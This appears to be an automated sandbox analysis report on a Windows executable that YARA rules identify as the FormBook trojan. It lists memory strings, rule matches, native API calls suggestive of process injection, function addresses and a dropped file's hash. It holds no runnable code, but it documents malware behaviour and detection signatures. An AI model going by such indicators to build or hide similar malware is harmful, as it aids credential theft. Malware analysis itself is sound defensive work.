Source: SearchProtocolHost.exe, 00000010.00000003.2406556463.00000000079FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: FGGx944Qu7.exe, TBsjWljiCpR.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2030469230.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0042AEF3 NtClose,	8_2_0042AEF3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040A5A8 NtMapViewOfSection,	8_2_0040A5A8
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632B60 NtClose,LdrInitializeThunk,	8_2_01632B60
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_01632DF0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_01632C70
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016335C0 NtCreateMutant,LdrInitializeThunk,	8_2_016335C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01634340 NtSetContextThread,	8_2_01634340
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01634650 NtSuspendThread,	8_2_01634650
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632BE0 NtQueryValueKey,	8_2_01632BE0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632BF0 NtAllocateVirtualMemory,	8_2_01632BF0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632BA0 NtEnumerateValueKey,	8_2_01632BA0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632B80 NtQueryInformationFile,	8_2_01632B80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632AF0 NtWriteFile,	8_2_01632AF0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632AD0 NtReadFile,	8_2_01632AD0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632AB0 NtWaitForSingleObject,	8_2_01632AB0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632D30 NtUnmapViewOfSection,	8_2_01632D30
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632D00 NtSetInformationFile,	8_2_01632D00
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632D10 NtMapViewOfSection,	8_2_01632D10
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632DD0 NtDelayExecution,	8_2_01632DD0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632DB0 NtEnumerateKey,	8_2_01632DB0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632C60 NtCreateKey,	8_2_01632C60
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632C00 NtQueryInformationProcess,	8_2_01632C00
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632CF0 NtOpenProcess,	8_2_01632CF0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632CC0 NtQueryVirtualMemory,	8_2_01632CC0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632CA0 NtQueryInformationToken,	8_2_01632CA0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632F60 NtCreateProcessEx,	8_2_01632F60
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632F30 NtCreateSection,	8_2_01632F30
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632FE0 NtCreateFile,	8_2_01632FE0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632FA0 NtQuerySection,	8_2_01632FA0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632FB0 NtResumeThread,	8_2_01632FB0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632F90 NtProtectVirtualMemory,	8_2_01632F90
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632E30 NtWriteVirtualMemory,	8_2_01632E30
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632EE0 NtQueueApcThread,	8_2_01632EE0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632EA0 NtAdjustPrivilegesToken,	8_2_01632EA0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632E80 NtReadVirtualMemory,	8_2_01632E80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01633010 NtOpenDirectoryObject,	8_2_01633010
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01633090 NtSetValueKey,	8_2_01633090
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016339B0 NtGetContextThread,	8_2_016339B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01633D70 NtOpenThread,	8_2_01633D70
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01633D10 NtOpenProcessToken,	8_2_01633D10

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_015EDFEC	0_2_015EDFEC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_054ED1B8	0_2_054ED1B8
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_054E68C0	0_2_054E68C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_054E0040	0_2_054E0040
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_054E0006	0_2_054E0006
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_054E68B0	0_2_054E68B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00402853	8_2_00402853
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00402860	8_2_00402860
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00401150	8_2_00401150
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00403270	8_2_00403270
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_004012C0	8_2_004012C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040FA8A	8_2_0040FA8A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040FA93	8_2_0040FA93
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0042D323	8_2_0042D323
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_004163DE	8_2_004163DE
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_004163E3	8_2_004163E3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00402440	8_2_00402440
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040FCB3	8_2_0040FCB3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040DD33	8_2_0040DD33
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00401D80	8_2_00401D80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01688158	8_2_01688158
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0100	8_2_015F0100
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169A118	8_2_0169A118
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B81CC	8_2_016B81CC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C01AA	8_2_016C01AA
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B41A2	8_2_016B41A2
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000	8_2_01692000
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BA352	8_2_016BA352
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C03E6	8_2_016C03E6
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E3F0	8_2_0160E3F0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016802C0	8_2_016802C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535	8_2_01600535
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C0591	8_2_016C0591
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B2446	8_2_016B2446
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A4420	8_2_016A4420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AE4F6	8_2_016AE4F6
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01624750	8_2_01624750
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FC7C0	8_2_015FC7C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161C6E0	8_2_0161C6E0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01616962	8_2_01616962
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016CA9A6	8_2_016CA9A6
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160A840	8_2_0160A840
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01602840	8_2_01602840
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E8F0	8_2_0162E8F0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E68B8	8_2_015E68B8
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BAB40	8_2_016BAB40
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B6BD7	8_2_016B6BD7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80	8_2_015FEA80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160AD00	8_2_0160AD00
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169CD1F	8_2_0169CD1F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FADE0	8_2_015FADE0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01618DBF	8_2_01618DBF
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600C00	8_2_01600C00
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0CF2	8_2_015F0CF2
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0CB5	8_2_016A0CB5
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01674F40	8_2_01674F40
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01642F28	8_2_01642F28
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01620F30	8_2_01620F30
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A2F30	8_2_016A2F30
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F2FC8	8_2_015F2FC8
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167EFA0	8_2_0167EFA0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600E59	8_2_01600E59
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BEE26	8_2_016BEE26
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BEEDB	8_2_016BEEDB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612E90	8_2_01612E90
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BCE93	8_2_016BCE93
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016CB16B	8_2_016CB16B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0163516C	8_2_0163516C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EF172	8_2_015EF172
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160B1B0	8_2_0160B1B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B70E9	8_2_016B70E9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BF0E0	8_2_016BF0E0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016070C0	8_2_016070C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AF0CC	8_2_016AF0CC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015ED34C	8_2_015ED34C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B132D	8_2_016B132D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0164739A	8_2_0164739A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A12ED	8_2_016A12ED
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161D2F0	8_2_0161D2F0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161B2C0	8_2_0161B2C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016052A0	8_2_016052A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B7571	8_2_016B7571
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169D5B0	8_2_0169D5B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F1460	8_2_015F1460
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BF43F	8_2_016BF43F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BF7B0	8_2_016BF7B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B16CC	8_2_016B16CC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01609950	8_2_01609950
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161B950	8_2_0161B950
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01695910	8_2_01695910
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166D800	8_2_0166D800
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016038E0	8_2_016038E0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BFB76	8_2_016BFB76
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01675BF0	8_2_01675BF0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0163DBF9	8_2_0163DBF9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161FB80	8_2_0161FB80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01673A6C	8_2_01673A6C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BFA49	8_2_016BFA49
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B7A46	8_2_016B7A46
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016ADAC6	8_2_016ADAC6
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01645AA0	8_2_01645AA0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169DAAC	8_2_0169DAAC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A1AA3	8_2_016A1AA3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B7D73	8_2_016B7D73
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01603D40	8_2_01603D40
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B1D5A	8_2_016B1D5A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161FDC0	8_2_0161FDC0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01679C32	8_2_01679C32
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BFCF2	8_2_016BFCF2
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BFF09	8_2_016BFF09
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BFFB1	8_2_016BFFB1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01601F92	8_2_01601F92
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01609EB0	8_2_01609EB0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_0161DFEC	9_2_0161DFEC
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F34130	9_2_02F34130
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F38860	9_2_02F38860
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3C3A8	9_2_02F3C3A8
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F34120	9_2_02F34120
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3C7E0	9_2_02F3C7E0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3C7D3	9_2_02F3C7D3
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3DA80	9_2_02F3DA80
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F33B80	9_2_02F33B80
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F33B70	9_2_02F33B70
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3BB33	9_2_02F3BB33
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3BB38	9_2_02F3BB38
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3BF70	9_2_02F3BF70
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F34D20	9_2_02F34D20
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F34D10	9_2_02F34D10
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01040100	13_2_01040100
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01096000	13_2_01096000
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010D02C0	13_2_010D02C0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01050535	13_2_01050535
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01074750	13_2_01074750
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01050770	13_2_01050770
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0104C7C0	13_2_0104C7C0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106C6E0	13_2_0106C6E0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01066962	13_2_01066962
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010529A0	13_2_010529A0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01052840	13_2_01052840
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0105A840	13_2_0105A840
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01088890	13_2_01088890
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010368B8	13_2_010368B8
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0107E8F0	13_2_0107E8F0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0104EA80	13_2_0104EA80
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0105AD00	13_2_0105AD00
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0105ED7A	13_2_0105ED7A
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01068DBF	13_2_01068DBF
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01058DC0	13_2_01058DC0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0104ADE0	13_2_0104ADE0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01050C00	13_2_01050C00
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01040CF2	13_2_01040CF2
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01092F28	13_2_01092F28
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01070F30	13_2_01070F30
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010C4F40	13_2_010C4F40
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010CEFA0	13_2_010CEFA0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01042FC8	13_2_01042FC8
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01050E59	13_2_01050E59
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01062E90	13_2_01062E90
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0108516C	13_2_0108516C
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0103F172	13_2_0103F172
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0105B1B0	13_2_0105B1B0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0103D34C	13_2_0103D34C
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010533F3	13_2_010533F3
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010552A0	13_2_010552A0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106B2C0	13_2_0106B2C0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106D2F0	13_2_0106D2F0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01041460	13_2_01041460
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01053497	13_2_01053497
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010974E0	13_2_010974E0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0105B730	13_2_0105B730
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01059950	13_2_01059950
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106B950	13_2_0106B950
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01055990	13_2_01055990
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010BD800	13_2_010BD800
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106FB80	13_2_0106FB80
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0108DBF9	13_2_0108DBF9
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010C5BF0	13_2_010C5BF0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010C3A6C	13_2_010C3A6C
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01053D40	13_2_01053D40
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106FDC0	13_2_0106FDC0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01069C20	13_2_01069C20
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010C9C32	13_2_010C9C32
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01051F92	13_2_01051F92
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01059EB0	13_2_01059EB0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe B600C43E2980691952532A79E7A0AEF2351AEEF6F740FD2F56647509C93B6DA0

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: String function: 01635130 appears 58 times
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: String function: 0166EA12 appears 86 times
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: String function: 01647E54 appears 99 times
